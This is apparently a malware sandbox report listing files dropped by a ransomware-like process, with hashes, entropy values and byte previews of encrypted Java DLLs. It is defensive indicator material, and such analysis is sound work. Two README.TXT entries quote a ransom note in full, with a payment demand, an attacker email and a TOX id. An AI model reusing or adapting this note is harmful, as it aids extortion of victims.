                                SHA-512:478C0FF4B48FA09C635993855D1708707951693BE780EEDA792F047B77C7514EB14E546FA9A59B525488D7B1AFFAD7045088B68348ECF2B45CF4677A5FBF0957
                                Malicious:false
                                Preview:0M....z..D[..B..l..v...+;..j..~).*..d.[.|...^..>~J.1..P..gn...'.wv.N....s.O....MD.B=.f.(..G...Y.I...Q.$l...Kr.J..O..<.pl,$..pan..7..1#.n.X7.......`..^...."..s&.K.F.....j.#wx....d.<"'o.@.b^}....?.....X...y@..7?.4...C.n...jN...]....2b8.U70....qa.......u...7V.x..<....v..D?..F..C........z.n]...&I'.)..C7....2.1?|..JP....../ .....u{H8B.e..`..w.........?.5..r....m.U.v.l$.....5Y~.&...*~...Zy...kg0g)B@u.L..zz.f..|..#...4.=......1...G}..."..{.y.~.....,B.j.%3q.nS..|T.zT.g.D.a5o;:X..J...j........./3V..DN.........rY.N$...j.=C..)..a...{.H|_..RNR......s......:E..p..../...5"TA.h..h..../...%..LO.....,f..1...|.D.DO..`.[.8..(.EJu....(u...N.>.$..9.je..xQ.`.@. ..G.>.......#.....~R%D.i.W.....T.R........{....>....-...I.$z8>FqT.t.>.....r<.9.ME-..9...`.C...tq..rk\]%.9......?A........[u.. z3@h....[X..f....dJ.0S.......D..s..tx.gx.r..gH.R.c.>..R..u..gNpm>.O5.......X.u..k.PaA..pR).c..Ws..m.-7$..MNa'.5...}.RD...Ba"..c..0..V.6.Q...w.?[Y.Y..<..z..F..8...K......z.

                                C:\Program Files (x86)\Java\jre-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):12352
                                Entropy (8bit):7.985652231270132
                                Encrypted:false
                                SSDEEP:384:6n36ogLWbrGQ0DXgE0Lvk0/dV4FV3l8Pt+VOj:63eLvVLIg0r4FV3l8Pt/
                                MD5:E834172EC7BBD9CBE88F4FBB1C22A1F7
                                SHA1:639E4E274D0F204B0EFC2DEECF980E64BE64A365
                                SHA-256:969FBBB903626DF64C55F617658FA0114B80056A3AFBB280191F679F2ED2F7D8
                                SHA-512:9B94E30B8B4D3335C2B4CA2C04707CF015321EE1D4FBFE98CA990EE47EE00DCA53C52CC5BE06C11E6F3E63804AB651E0EFBB033949042619804AFC225EB8FCBB
                                Malicious:false
                                Preview:i..z.....Zb..GR~.f!,........Y........}...DWz...2...@..Q}Oh.^EI.9...\l........'z.p..3.....m.5.....h~.>:...MC"..G......%.o.....\...../....y[.7....z!.R>~k*...s :k$.1..?.c..\.8...R...)6..t...U..x.../.5\T.&......Y...{.....!)Z#?..w..!....m.....xs.$t4w....uz.|. \......C.....Kv8.'..a.\.B..>.G/./....a..<....W(m..%ua.+.T.>B....2[v.W..*u.0.E.2Z.p..*.Z.....a...X....Z.H...J...5f.u9d.B`..!.tLps~......'B.|...5....)^....)j>.....|.r)KI.....}qw.a.^..Qpg{..Z.`...9.6(.Xl..L1.E....gY7.......K............p..j@..535h6..@.S&F..OI,{..v...2..es.......J\....M.b.....|...G.^...A.BP........ ..E.&.(^!...0.......bQ..m..p.........QlN.4{G.....{..w'...h&= .2......h...6..tuyd*.Z..6.p3..*..k.*...U.B.u.>...nW..Vyu.....G..m...|..j".....:...u...........q]i.Y#'K.E..D`....%#.`...K.t[.r..9..1F.kP......SGb....B.8a..q...3..|w.}.I.#..\H.F....S..... $....K%E...........e.....X......{c.w...2{(.'.R.g:1o..a.u.......Ew4...?..I......g...E.}.9..$X)T.T.gE8 d.IA}.Z@>...lD

                                C:\Program Files (x86)\Java\jre-1.8\bin\awt.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1225440
                                Entropy (8bit):7.110335695382455
                                Encrypted:false
                                SSDEEP:24576:JA0qrzTILfgikyNZ0mZ/VNGqhHfaU4Y0NM+fg5LD6ipY4OxJWf3AIarI8yH5Am:4rxcC4OxJQa2HZ
                                MD5:CC4432342BB0EA9C9984D02C0E18E417
                                SHA1:F0681FE6626C26EF92427561B62C447EB8C4894A
                                SHA-256:73087A4CC8CDE3005550DFB941EB9F10BB61B96AFF81E848538642F442441C4E
                                SHA-512:3065C2B03E1FE7E4C302179665A688053A1C26006997A4B224C015EC473F3FE739D1EA21E231D415E4D03F5CCE0937329E6886332A041F786B0DB757A9937523
                                Malicious:false
                                Preview:....+.m...t....]...l...MK..as.^._w2.<..Z@..~.......b...\..#..}.../.|.q.:3.+w..X..7<.f{..?,...Y......%0x...`.~..{./.*_=......e.Ie.m!K..y...8..:F+cuFF..}...2........@{..MmVP.O..u...".&$...o....:. .."...y.,..b.)&...I.6..>..J.#...N.......P.Z..T..=".......u.^.......R.xu3...,..o.f.Z.....(.Y....$'..g$...2Uqx.G.,..q.3..Z..W..83{fS....z..e..qt.$Q_&a.2...?..no...._.,`>C]......p ..f..[{.uT`.jv,E...o...;H....or.?.bxo........].f...,s.l.....n8......... WY.p..G....P...~..Ze....Feq.BQ/.9.O.[&i...X..Ey.....CiQ..R...-...w..'$._<...`.T....Q2|.|?.s$..*....O.......... Ih.|F#...g..!.[...|..J..ub.^..j.1t.E..U...4.Q/.f:(%.R..:.h.*.In..)"N..$.j.Yy..U]...1..^.........#..........e..+..i.}....).........m...}j.*....1.'{.p.j..L.+dO....c......yiB.prW|.S&.P.;\....".....v.O....ef..i..E...V.y...i^q.....0..L....E*..B..........9....p.......#../'.....M'.D]x..\.FC...IJfJ.:.......6tK}X?9....-T....$~'...>,...0...8PZB.........U..@..........=.;...`...<3.~.g..3....b.K.#.3V.5....><..{..

                                C:\Program Files (x86)\Java\jre-1.8\bin\bci.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22240
                                Entropy (8bit):7.9918066412935165
                                Encrypted:true
                                SSDEEP:384:R8RPpKyikMq0g34qtKfSjPTGwx2qS99KbkR7FiQRXrC7eS2Ah+VOg:6PpKyie02UKzThx21/rLTFen2Ahk
                                MD5:4965A7A05326AE1ABCD697DF17EAD004
                                SHA1:F6653735F926634947EB765EDB74058B571F299F
                                SHA-256:519A6D1421C60000E86AEB8A66A6C69BD022BCBBDD6653B6C26F2818FF008274
                                SHA-512:809D383198D910ABD46A4CEB358DEF63D089F4BC0648ABE1261F5FAB2FECE8B776231AD5B41669F327717A5724F1DF69B08AD9520FDBFB7BC2027945CBDC46E7
                                Malicious:true
                                Preview:B.I./..6)$O*S.......DMg.!..o..;.....g...%...`s;@..&..U].,.Tz.k...s.j.V.`'.....|.c.h.A.Ko.3...g.N..,..."....v....g.|;..p...Y..9..%1.......L..pY..I........o.x...N..P^........-...&h.....e...@..U........R.o(.J........g....Eq..J..p...0..w..#1.P.b..>.=.c5.U..M...f.N3xE..;.:.$.....q........-.........b1.:0..... .?...w.c;..fi v#A .b..F...v...=.t.P....M.O..!.Z7.q..~7.g.....x]........g..r..y...t....(.Q.LN.u\.WBP_a}L(.._..+..B..#..{JQk..kt......}..dk...~eW^h7f."..H...vp..+..4:.~...'..g.n....g.e..h...{..Qk...n...+Q.]z.).onH..+.t,.%...8u.a[..........7.F.d.?1...C.}.cc?(.R`N.....{..e....IZ..,ONP..\J...i...v....D"....h.w..N.P.Y...b.....Su..lq(.G.u.d...#..U&...A..<:....\.j...v......X....c....P.bK4bbWX.)m.n..n..5...C.o......R.|..y. T....;./...Gmm.f....b 8@.,.....?7.+.e..%........*e.uX.h.;.4vS.Q0..9.D...[..)..LK...{.......O.:Vr j. .(c.....a@a?}c._3G.f.$=.|.G...*.4..Y..B>U._t.....1d...7...?.v.6$L`W|.v)~.x..A.)..H.=....A.[]....rU'..(D..F

                                C:\Program Files (x86)\Java\jre-1.8\bin\client\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\bin\dcpr.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):152288
                                Entropy (8bit):7.999000054378898
                                Encrypted:true
                                SSDEEP:3072:CB3fqO7ZrbcGHeYurqjPhvwz/DeazV4FXxpSvh8ri8b0OFf+E/xRXrMphmF:CVjnpX6qbhvGbeahC4vh8jf+EJNrImF
                                MD5:B0D2F4C3E7433B02763CACF14555AC37
                                SHA1:6E7A2F74B67939295C2CBD6E5EFB75CE40D8850C
                                SHA-256:2FE6D9553D5D547CFFEF7B897E4742F23438E7A4BA3B5178BF6071EB004D0FAA
                                SHA-512:244F94E20AEBC5ECC4452127B76167BB8332B7CB40F04CBBC33D5D69C5D327DFEB2B031B81530C679BACDC189A0BE66E84DBDE540F1D55CE54856201CB55D804
                                Malicious:true
                                Preview:.O._F.]@...o.jf|._g0....9...._5.aP.Y./.KHdq..>..B.....j...G d....VMq.0..Sf.DZk(=.......+.`..".%....m..B......`../W..O.....@........bWS...5VL..N..v.A."...^e..B_...`.1.....q...f....&MXr.d.o....r...e. ..A.,WY#.%..A/L...7...v.1=.H.t.nP.S...,...?.SUpO.TP.vj...J.VHZJ.CT........`...-z.;:.....&?.G.o.b.{#....;$x.......i.uGv.....t.b..!....:...a.]{.o.I...j7..v.=..(x.mh.$..=.^._....V...'.....H*.nZ..G.fv..W...........2..q..0..:..q...y...+R....Ng.5s....0>.GO.\.38.U..i,...r...........<G.^.y..P ........s..."F....5...y. tuo.X.O.9%....`.a.nV..R.?JM.......e/q...%....4...s1.`?.4a.N..H..svh.v....DC+.T w.$.=.a..=.%...l..K8a.....s.WA...V.e.sY.o..u_...a..*F.......~mRH...m../.W...._.?...@..|A0+M.[....`>t#....F..z!....y.2.lA....H.........K....q).U..f....ve.>0........^.$.a.Sa.n..z.......n...i./.V.......H...,....*n.1..:-"K,nS.T..r|..q....6.uq........._.u....92N....%...>.v.,.I.[c.....".`.R.(.$VM..5"x].7.L.~(.m...^.}.]2S.T.......%....8.G.O..%...g.,..p...Q.c..e.7]..X.C>

                                C:\Program Files (x86)\Java\jre-1.8\bin\decora_sse.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69344
                                Entropy (8bit):7.99729730135454
                                Encrypted:true
                                SSDEEP:1536:8JQikin9kIVdO+K/BaJPnLJx37JefPJ9jTHMtNMnMu+clnMNhBt3:Rin9kIV0+0ALX3Ifh9jDMtWJ/Mfv3
                                MD5:D7A09623574E8DCF2812B319BB86FBE5
                                SHA1:EC4F1C38584EF40D62A132E366362186B61B846E
                                SHA-256:01637B95E9F001AF2B664DC85307DDA1B208C33FA43DE698C1C783F490372030
                                SHA-512:3CAB907A1F9D3D13CD10A0F901D81A291475261B7C50208A4FEB475C6691BC755322B34C9150BC4E242ACDAED31B3B86987556176209B4B8725B547BD28254DF
                                Malicious:true
                                Preview:.....L.R.....".{.?....h..R+.A...=..z..Ak......A.,!:#.....u....I../.....~w.+..M...j....../`...<.r.0....5..-.E?p..k5...<.]iL.w<...cEK.~.I.^Qa.on.......$....~[...(}m.;....*.o......C..f......~p..\..,..3..1._..QU.z:b^.... vB.71.YO..e&/..\.*}.&...{.\.S<.S2...M..E.d..-*.s.]0r...R-....M.c.iBh........U........>...cU.'T....8...e..{..x7.:..s.'H.Tv.dX.i#.I:#.}...M2.%GQ..H.l..4I..kh......'?m:..m.......L~W...2.D...J\.-k.g.c........"d..i....{.t...].[.....9..u....<t....\3.....U.:.@)|..2?....GPt.m....^..JT..).`.d......u....AG...^e....._b.U.....;...."(.kc..8.s6....}.62?(,..kh........E..m8..J=..L...TN.vF.......6....!4...w...XC...~..L$.Q...T..A....69...8.L...].o..A..G^...u"m.16.f...`B.*......B .gng2b..[_.Jb.M.Bx....8C|..3...JD.T..>L.ePd.^...`..Fy&.P...=5..CR..ODXtc,...._o.j.2[.O.".y........;..G..B.o.R7B.2......!...+.N..Q.h.1.-....{.&.>*.$.4n.*...hsY.mQK9....o>1..m...D.>..l...f.....f.'..t.....D~Zeeiv.u..b`{5g.......b.X.R..u...m[...C`.m......z..2..C.Ij..m..%.

                                C:\Program Files (x86)\Java\jre-1.8\bin\deploy.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):448736
                                Entropy (8bit):7.742703452746421
                                Encrypted:false
                                SSDEEP:6144:D8vdlobcx94J45VGTCPqAKaVJ9/tCOjfjFLX1Luu4JUfHtMUj955JNtdgC+nlKG:DhbcxG6rPqgJ9BRtBGQFtdgjlr
                                MD5:208C15112222EA11D01738CCAB047058
                                SHA1:6DB8EB73CB54153A0F10EA58418B5FAA4CA1443A
                                SHA-256:8E61BD39CD5724A3F34018910CE2535FB6B5A115C49B6690AE12365550A03FA8
                                SHA-512:4E3A4638B45CB25B9B786378C1903D02A50B1AAC78C7BF70AAC0816C44C75EA335B37E42E63534DE85249F3D00261AD1B6C3E8A9E7A6797980F7E8840C913B87
                                Malicious:false
                                Preview:.....@..U.(o.S.s..y...;.i...O'.= ...*tq...@.(hn.v.....a7."mH[.avq..$.<.<..X.....D..5...f.....W...y..../K..L..|......u...M~D:#+..2.z............~.`O)...j.J......_#.85.<...o..2^...1vx...U.&.p`yR]......d.8.E.6...q...[.p.r..J_[u/.q~.c.+...29.P..|J9.H...a.A...c......hY4.Q....wt...r\p..l..F#{+...........O...R+.a.kn......Vi.<.d}......y.I....%..".R...M.9..h.;w.. nT4....@.. u.S.......4.....Q.3...V...2..9.>8..N|m.x......#.}..v.._.....v..[C.xZ.ct.+.%jxX*.)..>..%#P|..v...L..K...p..S....N`.E..hz.g..oc.....wh#.5`..la......t.l.....[....l-.+.Kg.._b..J...U.<F...-[..@z;st..,;...=...U....!.5/.d..9....~.[.Q`u><.F....".F............Y.fZV..r...J4.^8.......H...k...B!W..`.^.....6.N[Y.I...s..Q...>..Ph..5m.........4.....e.P..:VU.r.@i.S.....>.c.F.o.....|g.?o......&~$....1.9@.0.N1]Ey....U..P/.%{L_.XA.b....`...4W.t...T_..8..<.........]pCdk.....@6.g.N.\.......Z.+^`.......8..p..i..._2/g~ZN7..e.....M....fey..;.b.........m.XY@.g..F.{MV`V....B..~.........

                                C:\Program Files (x86)\Java\jre-1.8\bin\dt_shmem.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):32480
                                Entropy (8bit):7.993860741449151
                                Encrypted:true
                                SSDEEP:768:ybqdogMeodfu87d87VaNbTXJmbmbmcLscyLwBrDNKk:PdogroZu87dGauybAG
                                MD5:9F4EFE8BAD680F19868B775ABEC37AE2
                                SHA1:E34B7AFAD8E19CE1821FD4EA333F76450C34401E
                                SHA-256:65F8E5926EF9A99B5846349BD2B933787E73A6F1A1558CC26CD7D52813A1F975
                                SHA-512:834120B3133C4FC9C765A2F19CA2C0281EE9B2449E7A83AA3B7FE3E4CC9E2F81DAF29953178D633451E723D2BADAE33C62ADCABAA862FE0E35234CAA7CFF48BF
                                Malicious:true
                                Preview:.S...".....F2.v.k.aYD./.+......c..;Z0\lv.u.[Y.....\q0....^O.EW....t.].?.31.VT.I...r..1cR.."7.v.........3..k.sU...u...._.....#w..E..f.i#. s..[.P.....<......u 8...-.1.o...d...].xo.`....J SK....W.Or\..<.f>.w..G.....f..z.].|.z....t..V.k.9..O..7a.....y...z.U .-..I`p.L..B.z.[.l..Y.M.2.q ..oC.z..V/~m...)..%...+...]YB..4.y.....6.t...1~g.......Gm..V.1..,.V,|. .kSC.e...)(p......r)..fA..<..f......57'...mw..N.O..k.R`;.....X!.{.........WBO..TZ.xxq..u;.`.9.d..Z....cp......^...t..<.D0..U....&....4..6+H......\...f.3{...N..6.H^...:R_.?......U...{?x7!g~L.,.b..D...~.k.......M........"....=.r.e&+d<.....g...t...D.n./._|.%W..> f.........../.#.g...w.:.N..W..&.VH..Q..d%....kc...+.-..8..`...G.hy.....`.6:H.......M4..<.....7._....A{....F...cR......X......7..cyr......O0c0..4\..z.wa.U.I(....e..f...%_....vC%....SGH."..7>....4.F9am...u....L6Y...=.7.....x...TbL...........B..[..].....je....$........].E&F.'F..9.&!......$$...........%8......CS..;....J.>j....H.c.$]...

                                C:\Program Files (x86)\Java\jre-1.8\bin\dt_socket.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29408
                                Entropy (8bit):7.9934654335168265
                                Encrypted:true
                                SSDEEP:768:5TJLgkdt3Wv9Ds1tDt/RsCu77RiEtcJmiGNIK1EnmlN+y+UH:Pn/W1Ds1PaP/gEQmiAEnmlN+H+
                                MD5:D48E9C2D736F162D5B0A5B333DBE43B0
                                SHA1:E1C9955A57DC4664DA2F31F51A05D905B4A1D8CD
                                SHA-256:2DD3769FF99BC204A1BDE905067F8571473148E4B138B2B3392AD555D2ADEF06
                                SHA-512:A02D82AE9D5D6FB3C144742A8635E2DDF3338880B2596F28CCE682989155DD76741B9CE0AC4419CEDC74ED07E8587F573AF1B9F485D77F8F40F4E20D40E21FA3
                                Malicious:true
                                Preview:]\..... ..?Ri8..V...S.)v......QL.+..2o....5-........G......CF....fA.j..X..R..0..XrK..~+....5.....O..L.5y..;.}..+\.Ow..`.....fe..l>....e.Fm..w..&.x7;.=0zx:Z.3..)P....$.&..s...w1/N. /..........L{...;/7...|....J..e;.....^..........}...Ii.c.,.k~.xG........Wq....."u=........vH....&.[....:.'Sh..9..u.:.oT... ...0....,Qs.i.U{.......d-.....La...<...;%..+..$..B..A..`.4|..+.&. .....$.m*~rZ....c{ h.*$......D....V..A...s...y...?F.....=..1.^.D.....:X....'....'l.T;..a.7.._?......w.....D........T...4.O..(..X.G.QGTT.......6...."i...-{....V...r#....YKP....>~...../.....496....D{...^......].?..>j@%........u-......g.Bm.O.......!....x.GgR..}A=...`.K6}T..Zx..2s.....'.h"xj`G..0......X._.m....^....!..{.D....h.d...~.u.C..D..Q.<4l^_.9x.........%....A....... ..F..r...Q....T4./.(..<.qzG....'.....,..9.n...8.Q.......|W&.....8....5D.) ..<.r.5....L'!:..!.t..RC5.G..J........DU.}...rn,.......{p.h.'#..\w..6>-..Z./#..6K,s .y.b..;;.&"...6..,7........h..<..q..8.iy#.h.pB....{.

                                C:\Program Files (x86)\Java\jre-1.8\bin\dtplugin\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Java\jre-1.8\bin\eula.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):138976
                                Entropy (8bit):7.998712340519312
                                Encrypted:true
                                SSDEEP:3072:6jYg+qNzMnkwlWmqu1/YAQX5/0l3OIg7qdRzpN:/g+qNzMnkwlWkU1zOd/N
                                MD5:2D5F56DA2A52A98F94FCD3DF5195C5C7
                                SHA1:21EB2E8D805BA1B96086C21E5D9161EBE8E94836
                                SHA-256:7B9B9B15DBFDC71853E8E18D78E749A33E0F9311319F5F1D965171CCA451D996
                                SHA-512:A9D5F926098F5060B8B973FE6463961FE5A2342C66756DC1F9C784DBEEE071A5146516C5CE5D465FDAFDB3E06EAB790414332E2F503D6E6C2D5EEA530967DA49
                                Malicious:true
                                Preview:.:fhJ.UJ.7....js9X]..(...{.t....d.xy}..l..|.3.}C+.../.v......;Pu..)b...4..b.D.>Q..|....{c..l.},....A..T.....|. m.#....Vt@..Y`..-./..s..f...Y........cW.RW.....m.+...b.+....n........V....)o.a.aK7.S...h}.G.:E7..F.R.Q.%. IW|..$8..}..M.wU.R.'....(.h.y...5..H..R.4U.u.....|.....L..<.u3.gF....9.V.6.Q5...a..}.4.....y.......^...W.q..4...M.bA......#o.K...{.:.u2../..<t..G.S..7.}.....$C.JL.. ......u....h._.~QHg...s. ...BR..,.....@.A.L..~`=]..~.......a.(...R.%;...... .>.......l_....#..O%.yQ.s....3....(.&Ngt"I.0.S..]..P..i#ex.;.:..h..?.....d.....,..|.....`{l...........T..........0y.>.F.$.......+q/..G...wJ.3..K).%j......].......96U.&.7c.nh0.`C.r..........B..x=..f......].'....I...YN.:.A..Fg".8.........\..R.......eE.1..k......b..Jy.`..K...z..B|s.H$_...{\....2ka...........5.W.F7p...=[..,.W8...N......m..K..`.%....>.....r...B.xF.^{d..C.U...[.....J.eE.k...I.j.x.... 6....d....r.S.G.#..}.I.`..J.b...<3v..;.+.3%..@..*]@K..F.C....4.h.c.sn!.{.......~X..&.VN.

                                C:\Program Files (x86)\Java\jre-1.8\bin\fontmanager.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):265952
                                Entropy (8bit):7.999292482950315
                                Encrypted:true
                                SSDEEP:6144:kUSxlO77ke1gUcxOH61opWEBnOyvGDwfnIUw6LB:nSLe7kJCaqBnOyvBfPLB
                                MD5:C760023C8A9C190D35CE5E421C7794DA
                                SHA1:8384DBD108C4FBDF9C1355082330D169858B6582
                                SHA-256:9DC06096D11AE9226CC66821ECDAA1A320B4723F8FF2789743DD40F03C41E51C
                                SHA-512:6FCBA8CF26C9C848E50F17F4C261786634878CA4175FE976860354F588066F99005453F05976E6DA8CA801C4C9AA630584456779F2DCF89152BE8FEA13C3D311
                                Malicious:true
                                Preview:t.....C.....GVK^..XIH.c#.Qp.K.....q.}......!.D....,.D.....@..........X..rO.R.......'...x ...........n^N..%......Pa.~.T...%do.8..}.k...u.8.*.gX./. bl.O&z...]..D......p~.g....b.;.G...(8.QAR{...}.)....>X..B..;....o`.6.P=4b.U...?...{...}l....,..")...p@.s..!..J...C.T.OZ..E'.R%.J.'....Q.<.,H.y.4.WW..'...}w;<.D..j......?....F..-...../.k..<F+.........:..#.&=...fd...Y........s.1&.VB)...+.u.._.{......z2.e..fh..TPhQ.......Y.2.y...p....+s..K..j>...^..."...._....~...Y..7.4B./.....oll%.:......G.k..D.h/......3......l^.>......C..Q ...&..B.....k.y.@.-....J'.%.H..A..>=....4K.h..*w..\T.X8...N.}.4)....W..."...-..g....(.d..k.Z..)..,=.s.td.$...).r.6l........W."GDt.A6.Eu<........l.`..tq.I...vDF.;.e....uEp....b...L=..B.m.'.3..DVx...~..B.f_.&'[y.d..[.JR...W.4w6. .W....E_.o.c.>P[%....Vs...n..;.l..M.L.....gW...vj..x.2..H].......=?=.9..oa...6....t&..~.aM...=.64. ......#..a..fE.'{:.........:......Z........+*.=...3\.,pG.|P.^.e*.bu.......%..Y0....4.s9.....=.

                                C:\Program Files (x86)\Java\jre-1.8\bin\fxplugins.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):158432
                                Entropy (8bit):7.998802284391687
                                Encrypted:true
                                SSDEEP:3072:Wu8O7fs3U3OB9jX9fmiYXsHRghDD4UE2ysKbuxcpXcuKmBGF:W9OIUeB9jX9f2XsHorE2QbuxcpMKu
                                MD5:45619959E2E026C06BF53DB08B48E46C
                                SHA1:E94A17C21C9AAB11C8043772688F579D5AFCAAEE
                                SHA-256:EACC041FB222BD19E613388B9B37B5F70B1D05F98E56AFB92EFAE8B09A18B0F0
                                SHA-512:D69A7F225071EF061FF99024AF0D642A67D40F3964143700E9B41D8036D30C90F45B098B2E3977BA2A0D2218626B8D7B7F8DDA279A63E42C07ECFD1AF743DD8B
                                Malicious:true
                                Preview::...45p...&...C]....}'..7&X..1./..a.........'.j.E.........W..M.R+.e.@..]...G..D>.2#...].....z..G..-.V.......tU..#...C...g..K)M.yv\.X.../.@..7'i&E.@. .... B]..v18.:.sL.m..?U.."7U?I.l'Os.....,...l..1.M.:.@Z..ZM8#...Q...<..?.ua.l.".-..6U..Q......6..C.>.....C....q.N......4.>S(ZS{{.5.y@d6x%4...3..&.s..=s.i.....:..2......d.cE7.W....D.H.......H....{....&C[........$C.+.$...R.1B....].?.D.Y..9N....Rr.(..G.Y..b...<...TI....7b.DK=.G....M.N.O=...$A.X*...`....i..0....W0.....'...k..F.Z..%.....QK.r.....KE._..>z...,....^.....w..A9J8...|o?xE..M8...y..E....E{i.....E.Ei.rb.....y.L..!(.g@..fo.P.+....V.....~.(.`Im+.....~...M.i.$J..1...@....L...|....-..`...Ft.S.o...e...W ..&.B.7.I..<.`.,..6jV2.N.&2h}....../.`.S.....c.`".....A.......T..."........y.(.I.2.C..C...Y.r[<.{...E...U...^.....s}..>.Wr....Cd....o.(3...g.x#&.....Ns..%.n....uq..].@@......9b....[.........eb.(..4)../Z...S....@..06.46.......3..2O.w.y7..%.F..._.2......S.V...Jm.7.?s.}?L..{$.a.r...=..?D..r;..2.<\.

                                C:\Program Files (x86)\Java\jre-1.8\bin\glass.dll

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):222944
                                Entropy (8bit):7.999122844470482
                                Encrypted:true
                                SSDEEP:6144:V3xaJZo/SAnCedPlX+jfJsnrst0QbcBOX8TOkfIoEpDsn:V3x3/SALdPMfKu5bcBBbBEl+
                                MD5:F6875B13E6C2E4B8C9B997E253732419
                                SHA1:8BA9D4F4625A1C302C1BB74A202554B29078E2AC
                                SHA-256:8BCE89FD3205C0520E47ACBD171E0277D0CE1547CEEF3BD020E3A881039954A1
                                SHA-512:E736CC4AB9F64356C06C6B03BA25279695378E2F3818F438DD280D8FD3419C0A99AAA9E25F69C77B1F227246A8205B40AFFDEDAA8D8445B43B4E18DF0E6FF7F3
                                Malicious:true
